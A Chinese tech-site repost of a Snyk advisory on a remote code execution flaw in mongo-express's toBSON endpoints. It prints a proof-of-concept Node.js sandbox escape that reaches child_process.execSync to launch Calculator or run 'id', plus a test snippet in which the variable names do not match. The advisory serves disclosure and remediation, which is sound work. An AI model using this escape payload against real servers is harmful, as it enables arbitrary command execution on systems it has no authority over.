mongo-express远程代码执行漏洞

分类：软件开发应用时间：2020-01-08 21:02 浏览：743

概述

来源https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215漏洞详情贡献者

内容

来源

https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215

漏洞详情

贡献者共获得 0KB

Overview

mongo-express is a web-based MongoDB admin interface written with Node.js, Express and Bootstrap3

Affected versions of this package are vulnerable to Remote Code Execution (RCE) via endpoints that uses the toBSON method. A misuse of the vm dependency to perform exec commands in a non-safe environment.

PoC by Jonathan Leitschuh

# MacOSthis.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')

  it('should not be executable', function () {      const test = `
      this.constructor.constructor("return console")().log(this.constructor.constructor("return process")().mainModule.require('child_process').execSync('id').toString())      `;      const result = bson.toBSON(calculatorTest);
    });

Remediation

Upgrade mongo-express to version 0.54.0 or higher.

References

GitHub PR
GitHub Security Advisory

上一篇
流氓软件克星！超20万用户使用的利器

下一篇
2020年十大科技预测

全部技术交流软件开发应用人工智能与机器学习

点击排行